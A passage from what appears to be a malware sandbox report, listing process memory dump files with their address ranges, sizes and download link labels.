
        Filesize

        328KB

        Download

      • memory/1480-72-0x0000000000230000-0x0000000000239000-memory.dmp

        Filesize

        36KB

        Download

      • memory/1480-71-0x0000000000220000-0x0000000000229000-memory.dmp

        Filesize

        36KB

        Download

      • memory/1576-182-0x0000000000400000-0x00000000005A8000-memory.dmp

        Filesize

        1.7MB

        Download

      • memory/1576-184-0x0000000000400000-0x00000000005A8000-memory.dmp

        Filesize

        1.7MB

        Download

      • memory/1576-196-0x0000000074BD0000-0x0000000074D2C000-memory.dmp

        Filesize

        1.4MB

        Download

      • memory/1576-193-0x0000000000400000-0x00000000005A8000-memory.dmp

        Filesize

        1.7MB

        Download

      • memory/1576-186-0x0000000000290000-0x0000000000292000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1576-194-0x0000000076780000-0x000000007682C000-memory.dmp

        Filesize

        688KB

        Download

      • memory/1576-189-0x0000000000240000-0x0000000000285000-memory.dmp

        Filesize

        276KB

        Download

      • memory/1576-183-0x0000000000400000-0x00000000005A8000-memory.dmp

        Filesize

        1.7MB

        Download

      • memory/1592-212-0x0000000000070000-0x0000000000077000-memory.dmp

        Filesize

        28KB

        Download

      • memory/1592-213-0x0000000000060000-0x000000000006C000-memory.dmp

        Filesize

        48KB

        Download

      • memory/1600-239-0x00000000001B0000-0x00000000001FF000-memory.dmp

        Filesize

        316KB

        Download

      • memory/1600-244-0x0000000000400000-0x0000000002BC5000-memory.dmp

        Filesize

        39.8MB

        Download

      • memory/1600-241-0x0000000002C40000-0x0000000002CD1000-memory.dmp

        Filesize

        580KB

        Download

      • memory/1660-139-0x000007FEFB781000-0x000007FEFB783000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1704-153-0x0000000000330000-0x0000000000390000-memory.dmp

        Filesize

        384KB

        Download

      • memory/1840-55-0x0000000000400000-0x0000000000409000-memory.dmp

        Filesize

        36KB

        Download

      • memory/1840-57-0x0000000075421000-0x0000000075423000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1920-125-0x00000000766C0000-0x000000007674F000-memory.dmp

        Filesize

        572KB

        Download

      • memory/1920-126-0x00000000747B0000-0x0000000074830000-memory.dmp

        Filesize

        512KB

        Download

      • memory/1920-128-0x0000000075420000-0x000000007606A000-memory.dmp

        Filesize

        12.3MB

        Download

      • memory/1920-164-0x0000000073780000-0x0000000073797000-memory.dmp

        Filesize

        92KB

        Download

      • memory/1920-119-0x0000000074D30000-0x0000000074D77000-memory.dmp

        Filesize

        284KB

        Download

      • memory/1920-120-0x0000000076660000-0x00000000766B7000-memory.dmp

        Filesize

        348KB

        Download

      • memory/1920-165-0x0000000074F70000-0x0000000074FA5000-memory.dmp

        Filesize

        212KB

        Download

      • memory/1920-117-0x0000000000300000-0x0000000000345000-memory.dmp

        Filesize

        276KB

        Download

      • memory/1920-122-0x0000000074BD0000-0x0000000074D2C000-memory.dmp

        Filesize

        1.4MB

        Download

      • memory/1920-123-0x0000000000930000-0x0000000000A56000-memory.dmp

        Filesize

        1.1MB

        Download

      • memory/1920-112-0x00000000749B0000-0x00000000749FA000-memory.dmp

        Filesize

        296KB

        Download

      • memory/1920-124-0x0000000000930000-0x0000000000A56000-memory.dmp

        Filesize

        1.1MB

        Download

      • memory/1920-113-0x0000000000930000-0x0000000000A56000-memory.dmp

        Filesize

        1.1MB

        Download

      • memory/1920-114-0x0000000000130000-0x0000000000131000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1920-130-0x0000000002120000-0x0000000002121000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1920-116-0x0000000076780000-0x000000007682C000-memory.dmp

        Filesize

        688KB

        Download

      • memory/2000-82-0x0000000000400000-0x0000000000420000-memory.dmp

        Filesize

        128KB

        Download

      • memory/2000-90-0x00000000004F0000-0x00000000004F1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2000-83-0x0000000000400000-0x0000000000420000-memory.dmp

        Filesize

        128KB

        Download

      • memory/2000-85-0x0000000000400000-0x0000000000420000-memory.dmp

        Filesize

        128KB

        Download

      • memory/2000-81-0x0000000000400000-0x0000000000420000-memory.dmp

        Filesize

        128KB

        Download

      • memory/2000-88-0x0000000000400000-0x0000000000420000-memory.dmp

        Filesize

        128KB

        Download

      • memory/2000-89-0x0000000000400000-0x0000000000420000-memory.dmp

        Filesize

        128KB

        Download

      • memory/2000-84-0x0000000000400000-0x0000000000420000-memory.dmp

        Filesize

        128KB

        Download